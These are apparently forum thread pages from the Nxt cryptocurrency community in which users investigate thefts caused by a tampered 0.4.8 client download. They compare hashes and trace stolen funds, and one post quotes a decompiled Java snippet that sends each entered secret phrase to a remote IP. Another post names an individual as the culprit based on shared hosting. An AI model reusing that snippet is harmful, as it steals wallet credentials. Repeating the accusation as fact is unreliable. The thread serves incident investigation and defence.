In summary, what I found from Chrome history:

from download history, the malware link was: http://162.243.246.223/nxt-client-0.4.8.zip
sha256: 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06

the creation time and modification time of the zip file on my local disk was:
creation time: 2013.12.31, 20:31:14
modified time: 2013.12.31, 20:35:16

in that time period, I only accessed two pages:
20:29 https://bitcointalk.org/index.php?topic=345619.11740
20:30 https://bitcointalk.org/index.php?topic=345619.0

from the download history, I probably downloaded the malware from the first page, that is: http://info.nxtcrypto.org/nxt-client-0.4.8.zip (I found the new version and checked it on the first page, and it's true, there's an update there, but I don't like the mega site, its slow from my home, so I downloaded the link from the first page)

the thief might changed the link directly, or he might changed IP address of info.nxtcrypto.org

current IP of info.nxtcrypto.org is 46.28.204.121, which is different from 162.243.246.223

the following are some clues about the accounts where my nxt goes:

2 of my accounts were stolen, one of them lost 18198 nxt, the nxt goes to an account which only has one transaction, the account is 9793828175536096502, the nxt is still in this account, I find nothing from this account.

another account of mine, which had 93 nxt balance, was stolen to an account which have many transactions, I found sth from this account: 6164081464868000542, the first transaction to this account happened at 16 DEC, which refers to another acc: 496131565008433801, in this account, there're 3 incoming transactions from acc: 6635869272840226493, which I remember is the account of dgex, each withdraw at dgex are coming from this account (at least for me), so, if the thief is the owner of acc: 6164081464868000542 and acc: 496131565008433801, he probably has an id in dgex!
this is only account with very weak password and people were 3x stealing Nxt from it probably http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=496131565008433801 (or 1x Nxt were only transfered to the 2nd account, where we can see many aliases: 14527793117125736279)
|
|
|
PaulyC: the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history, the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip

please check your browser history to find which page you used for the download - where did you find a link?

how to find it from Chrome? I just find the link, not the webpage the link was in, there should be some ways to find that!

ctrl+h
|
|
|
PaulyC: the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history, the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip

please check your browser history to find which page you used for the download - where did you find a link?
|
|
|
Interesting...:

    if (!paramString.equals("")) {
        if (!myKeys.contains(paramString)) {
            URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
            URLConnection connection = url.openConnection();
            connection.setConnectTimeout(10000);
            connection.getInputStream();
            myKeys.add(paramString);
        }
    }

epicdices.com is also hosted on 162.243.246.223 - coincidence?

no, as I wrote here, we know identity of the hacker: 162.243.246.223 looks like it is "epicdices.com" ( http://domain-kb.com/www/epicdices.com ) Owner of epicdices - EpicThomas - is a member of this topic: https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
|
|
|
We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
|
|
|
I literally saw my client a few moments after it happened (it was open) so how this happened is odd!
My actual User account that has been stolen from is NXT 16821029889165561706
I don't have any idea how this may have happened either. Just wanted to confirm, at the moment the theft happened your client was running and you had the browser window opened, and your account was unlocked (you were seeing your balance and the "send money" arrow), is that all correct? Just trying to differentiate the possibilities, whether the hacker obtained your password via brute-force or some other way and initiated the transaction from another machine, or somehow your own machine was tricked to initiate the transaction. And you were running 0.4.8 at the time, right? I added the second check for secret phrase before send money exactly to increase security, so that even if your account is unlocked in the browser you still need to enter your password again. Another question, did you generate your random-looking password using some software - password manager, online service, or created it manually by typing at random?

I just wanted to clarify, with this, I had my server and client open. Was just perusing the blocks within the client, seeing if I was up-to-date, something I just do sometimes, and the account balance went from 7808, then on next look 0, maybe a moment later, less than 10 seconds. No one was remotely accessing my computer etc. It was just balance 0, account recipient ID under sent transactions with 7808, etc. Update ran a full scan with my antivirus software, ESET, all up to date, no viruses or intrusions found. The other question about password, this is the very first account I made so I did use the password generator that I had seen recommended on nextcoin.org used "local" mode, to a certain degree, http://passwordsgenerator.net/ (I definitely wouldn't recommend using one of these) for 25 of the char of the PW, then I just made up the rest randomly 9 more characters. and I'm not sure about what online nodes refers to exactly, but I can honestly say I never used anything online with that PW until today with CfB.
I don't see any strange opened ports so I believe I'm good on that end. Has anyone else noticed the 4.8 download zip from nextcoin.org vs. the one from this exact link Nxt 0.4.8 - https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI Are 5 Kb in difference? is that anything to be concerned about? I want to buy more NXT, but it just sucks cuz I got in somewhat early and thought I was following all the instructions correctly, and I honestly don't know what happened which makes me hesitant. It's not cool everyone thinks I'm some troll planning this all out, but I guess that's a natural reaction. I would hope in the future there's someway to stop someone from just taking someone's NXT like this, (I actually thought the two step PW on "sending" was a good idea, but didn't stop them in this case) I'll try to keep an eye out on this hacker's acct# to see if he hits anybody else. http://22k.io/-account/16204974692852323982

Looks like you downloaded a bogus client. Scary stuff. The client at the front page of this thread is legit. You need to calculate the hash256 of the zip file of your client and compare to the hash in the 0.4.8 in the front page. They have to match exactly. As you said you have two same client with 5Kb difference in size. One is certainly bogus. Sorry for your loss.

This should really be sticky. I could have fallen for this since I never checked the file until today. But for now, only use client file from trusted source and do a checksum hash256 the zip file before using.

This needs to be in wiki and the front page.

everyone can edit wiki......
|
|
|
KNFHVVWfvrLvz3Sx9mBdUB2k1hsK7BC186
|
|
|
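The whole-archive hash check recommended in the posts above, followed by a file-by-file diff of a suspect archive against a trusted copy that also lists hard-coded URLs pointing at a raw IP address; this is an added example, not code from the thread or from the Nxt project. The two archives, their file names and the 203.0.113.5 address are constructed sample data, and the function names are hypothetical.

```python
import hashlib
import io
import re
import zipfile

# Hard-coded http(s) URL whose host is a raw IPv4 address.
IP_URL = re.compile(rb"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/?")

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def matches_published(zip_bytes, published_hex):
    """Whole-archive check: the digest must equal the published one exactly."""
    return sha256_hex(zip_bytes) == published_hex.strip().lower()

def members(zip_bytes):
    """Map each file inside the archive to its decompressed bytes."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {i.filename: zf.read(i) for i in zf.infolist() if not i.is_dir()}

def diff_against_trusted(trusted_zip, suspect_zip):
    """Report added or modified members and any IP-literal URLs inside them."""
    good, bad = members(trusted_zip), members(suspect_zip)
    findings = {}
    for name, data in sorted(bad.items()):
        if name not in good:
            status = "added"
        elif sha256_hex(good[name]) != sha256_hex(data):
            status = "modified"
        else:
            continue
        urls = sorted({m.decode("ascii") for m in IP_URL.findall(data)})
        findings[name] = {"status": status, "ip_urls": urls}
    return findings

def build_zip(files):
    """Constructed sample data: build a small archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()

# Constructed stand-ins for the two 0.4.8 archives (203.0.113.5 is a documentation address).
TRUSTED = build_zip({"nxt/Nxt.class": b"\xca\xfe\xba\xbe unlock", "README.txt": b"0.4.8"})
SUSPECT = build_zip({"README.txt": b"0.4.8", "nxt/Nxt.class":
                     b"\xca\xfe\xba\xbe unlock \x00\x1chttp://203.0.113.5:3000/ISO-8859-1"})
PUBLISHED = sha256_hex(TRUSTED)  # in practice: the hash posted with the release

if __name__ == "__main__":
    print(matches_published(SUSPECT, PUBLISHED))
    print(diff_against_trusted(TRUSTED, SUSPECT))
```

The diff only narrows down where to look; a changed member still has to be decompiled and read, as was done with the snippet posted earlier in the thread.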
Hey, looks like I just got robbed, too. Someone please check this account: 12152013998194592943 They now have 147k+ from me. Had a 40 char random password, capital, lower, numbers, symbols. WTF?
you're 11794318797680953099? http://22k.io/-account/12152013998194592943
|
|
|
I can see those talkshows right now "So if I type "Barbara" as my password, some hacker will steal my money?" "It would take some time, maybe 5 seconds, but yes, you will lose all your funds." "..."
|
|
|
Just few things i don't understand... it was said everyone with > 50khs will be kicked from the pool
1) it's meant 50khs in total or per worker? 2) and if i mine in solo using a GPU? how can you limit that?
Thanks to anyone who can clarify that...
... and Happy New Year!
The 50kh,s pool is a special pool that is for cpu,s only * we give the cpu miners there some extra coins every day * All other pools and solo mining are not limited in any way NYAN!

so can people mine with normal notebooks without any special cards?
|
|
|
I finally published my blog post about Alias goldrush on 22nd December (how I spent 7 hours by registering 740 aliases): http://nxtcoin.blogspot.com/ - there are some personal thoughts and also some statistics
|
|
|
so the competition is over?
|
|
|
|